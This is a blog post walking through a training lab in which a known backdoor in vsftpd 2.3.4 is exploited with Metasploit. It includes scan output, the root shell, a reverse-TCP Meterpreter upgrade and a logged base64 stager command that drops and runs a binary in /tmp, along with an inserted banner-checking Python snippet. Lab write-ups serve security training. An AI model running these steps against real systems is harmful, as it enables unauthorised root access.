Exploiting A Vulnerable FTP Server

Posted by r3kind1e on February 1, 2023

Exploiting FTP

FTP (File Transfer Protocol) is a protocol that uses TCP port 21 and is used to share files between a server and its clients.

It is also frequently used as a means of transferring files to and from the directory of a web server.

Vsftpd is an FTP server for Unix-like systems including Linux systems and is the default FTP server for Ubuntu, CentOS and Fedora.

Vsftpd V2.3.4 is vulnerable to a command execution vulnerability that is facilitated by a malicious backdoor that was added to the vsftpd download archive through a supply chain attack.

Demo: Exploit A Vulnerable FTP Server

ifconfig
eth1: inet 192.209.183.2

Make sure that the PostgreSQL database service is started, so that we can interact with the Metasploit Framework database.

service postgresql start
msfconsole

Create a new workspace.

workspace -a vsftpd2.3.4

Set the RHOSTS option as a global variable, so that we don’t have to keep typing in the target IP address. This sets the RHOSTS value in every module we load afterwards.

setg RHOSTS 192.209.183.3

Confirm that we’re working within the vsftpd 2.3.4 workspace.

workspace

Perform an Nmap scan with the db_nmap command, which runs Nmap from within the Metasploit Framework console and saves the scan results into the Metasploit Framework database under the current workspace.

-sS: Perform a SYN scan.

-sV: Perform service detection.

-O: Perform operating system detection.

db_nmap -sS -sV -O 192.209.183.3

Review the scan results by typing in the services command.

services
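As an added example (not code from the original post), the same fingerprinting check done offline in Python: it parses FTP welcome banners and db_nmap service lines in the format shown above and flags the vsftpd 2.3.4 build. The sample banners are constructed, and fetch_banner is an assumed helper that only reads the 220 greeting from a host you administer, without logging in.

```python
import re
import ftplib

# The only vsftpd release that shipped the backdoored tarball (per the post).
BACKDOORED_VSFTPD_VERSIONS = {"2.3.4"}

# Constructed sample inputs (not captured from a real host): FTP welcome
# banners plus one line in the format db_nmap prints for port 21.
SAMPLE_BANNERS = [
    "220 (vsFTPd 2.3.4)",
    "220 (vsFTPd 3.0.3)",
    "220 ProFTPD 1.3.5 Server (Debian)",
    "220 Welcome to the FTP service.",
]
SAMPLE_NMAP_LINE = "21/tcp open  ftp     vsftpd 2.3.4"

# Matches "vsftpd 2.3.4" and "vsFTPd 2.3.4" (banner capitalisation differs).
_VSFTPD_RE = re.compile(r"vsftpd\s+(\d+(?:\.\d+)*)", re.IGNORECASE)


def parse_vsftpd_version(text):
    """Return the vsftpd version named in a banner or scan line, else None."""
    m = _VSFTPD_RE.search(text)
    return m.group(1) if m else None


def is_backdoored_vsftpd(text):
    """True when the text identifies a vsftpd build known to carry the backdoor."""
    return parse_vsftpd_version(text) in BACKDOORED_VSFTPD_VERSIONS


def triage(lines):
    """Map each banner/scan line to a flag: True = vulnerable build found."""
    return {line: is_backdoored_vsftpd(line) for line in lines}


def fetch_banner(host, port=21, timeout=5.0):
    """Assumed helper: read only the FTP welcome line from a host you manage.
    ftplib's connect() returns the 220 greeting; no login is attempted."""
    ftp = ftplib.FTP()
    try:
        return ftp.connect(host, port, timeout)
    finally:
        ftp.close()


if __name__ == "__main__":
    for line, flagged in triage(SAMPLE_BANNERS + [SAMPLE_NMAP_LINE]).items():
        print(("VULNERABLE  " if flagged else "ok          ") + line)
```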

vulns: List all the vulnerabilities.

vulns

analyze: Identify vulnerabilities.

analyze

VSFTPD v2.3.4 Backdoor Command Execution

This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
info
run

A command shell session opens. Our current privileges are root, the highest available on a Linux system, so we don’t need to perform any privilege escalation in this case.

Note that this is a plain command shell session, not a Meterpreter session.

Open up a bash terminal on the target system.

/bin/bash -i

Now we have access to the target system through a command shell. We can upgrade this command shell to a Meterpreter session; first, put the session into the background with the keyboard combination Ctrl+Z, which prompts you to confirm backgrounding it.

List out our sessions.

sessions

Search for the shell_to_meterpreter module, which will upgrade our current command shell session to a Meterpreter session.

search shell_to_meterpreter

This is a post-exploitation module: it requires that we already have access to the target system and an active session on it, which we do.

use post/multi/manage/shell_to_meterpreter
show options

LHOST: the IP address of the Kali Linux system, the system we’re currently working on, which will receive the connection from the payload. We can specify the interface name (eth1) instead of looking up the IP address ourselves.

LPORT: the port for the payload to connect to.

Set the session ID to session 1.

set LHOST eth1
set SESSION 1
run

We have a Meterpreter session opened up.

sessions

getuid: show the user ID. It reports uid 0, which is the root user, so we have root privileges.

sessions 2
meterpreter > sysinfo

That is how to exploit a vulnerable FTP server to gain access. In this case, we’ve also explored a post-exploitation module that upgrades our command shell to a Meterpreter session.

Vulnerable FTP Server

Overview

The target server as described below is running a vulnerable FTP server. Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a Meterpreter shell on the target!

Instructions:

  • This lab is dedicated to you! No other users are on this network :)
  • Once you start the lab, you will have access to a root terminal of a Kali instance
  • Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
  • The target server should be located at the IP address 192.X.Y.3.
  • Do not attack the gateway located at IP address 192.X.Y.1
  • postgresql is not running by default so Metasploit may give you an error about this when starting

Solutions

The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-179.pdf

My own approach

root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.15.82.2  netmask 255.255.255.0  broadcast 192.15.82.255
        ether 02:42:c0:0f:52:02  txqueuelen 0  (Ethernet)

Target IP Address: 192.15.82.3

root@attackdefense:~# service postgresql start
[ ok ] Starting PostgreSQL 11 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > workspace -a vsftpd2.3.4
[*] Added workspace: vsftpd2.3.4
[*] Workspace: vsftpd2.3.4
msf5 > workspace
  default
* vsftpd2.3.4
msf5 > setg RHOSTS 192.15.82.3
RHOSTS => 192.15.82.3
msf5 > db_nmap -sS -sV -O 192.15.82.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-02-01 03:20 UTC
[*] Nmap: Nmap scan report for target-1 (192.15.82.3)
[*] Nmap: Host is up (0.000025s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 21/tcp open  ftp     vsftpd 2.3.4
[*] Nmap: MAC Address: 02:42:C0:0F:52:03 (Unknown)
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=2/1%OT=21%CT=1%CU=44053%PV=N%DS=1%DC=D%G=Y%M=0242C0%TM
[*] Nmap: OS:=63D9DA78%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
[*] Nmap: OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
[*] Nmap: OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
[*] Nmap: OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
[*] Nmap: OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
[*] Nmap: OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
[*] Nmap: OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
[*] Nmap: OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
[*] Nmap: OS:%T=40%CD=S)
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Unix
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.14 seconds
msf5 > services
Services
========

host         port  proto  name  state  info
----         ----  -----  ----  -----  ----
192.15.82.3  21    tcp    ftp   open   vsftpd 2.3.4

msf5 > vulns

Vulnerabilities
===============

Timestamp  Host  Name  References
---------  ----  ----  ----------

msf5 > analyze
[*] Analyzing 192.15.82.3...
[-] Error while running command analyze: undefined method `host' for nil:NilClass

Call stack:
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/db/analyze.rb:49:in `block in cmd_analyze'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/db/analyze.rb:39:in `each'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/db/analyze.rb:39:in `cmd_analyze'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:522:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:473:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:467:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:467:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:151:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:49:in `<main>'
msf5 > search vsftpd

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   1  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 192.15.82.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.15.82.3:21 - USER: 331 Please specify the password.
[+] 192.15.82.3:21 - Backdoor service has been spawned, handling...
[+] 192.15.82.3:21 - UID: uid=0(root) gid=0(root) groups=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.15.82.2:45985 -> 192.15.82.3:6200) at 2023-02-01 03:32:54 +0000

/bin/bash -i
bash: cannot set terminal process group (10): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:~/vsftpd-2.3.4# whoami
whoami
root
root@victim-1:~/vsftpd-2.3.4# ^Z
Background session 1? [y/N]  y
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.15.82.2:45985 -> 192.15.82.3:6200 (192.15.82.3)

Shell to Meterpreter Upgrade

This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected. Currently meterpreter/reverse_tcp is used on Windows and Linux, with ‘python/meterpreter/reverse_tcp’ used on all others.

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   1  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > use post/multi/manage/shell_to_meterpreter
msf5 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

msf5 post(multi/manage/shell_to_meterpreter) > set LHOST eth1
LHOST => 192.15.82.2
msf5 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf5 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.15.82.2:4433 
[*] Sending stage (985320 bytes) to 192.15.82.3
[*] Meterpreter session 2 opened (192.15.82.2:4433 -> 192.15.82.3:55484) at 2023-02-01 03:52:25 +0000
[-] Error: Unable to execute the following command: "echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towA9SAmgCABFRieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZtgywA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/zAVGf.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/bbfpr' < '/tmp/zAVGf.b64' ; chmod +x '/tmp/bbfpr' ; '/tmp/bbfpr' & sleep 2 ; rm -f '/tmp/bbfpr' ; rm -f '/tmp/zAVGf.b64'"
[-] Output: "[1] 22"
[*] Stopping exploit/multi/handler
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                 Connection
  --  ----  ----                   -----------                                 ----------
  1         shell cmd/unix                                                     192.15.82.2:45985 -> 192.15.82.3:6200 (192.15.82.3)
  2         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 192.15.82.3  192.15.82.2:4433 -> 192.15.82.3:55484 (192.15.82.3)
msf5 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 192.15.82.3
OS           : Debian 9.5 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0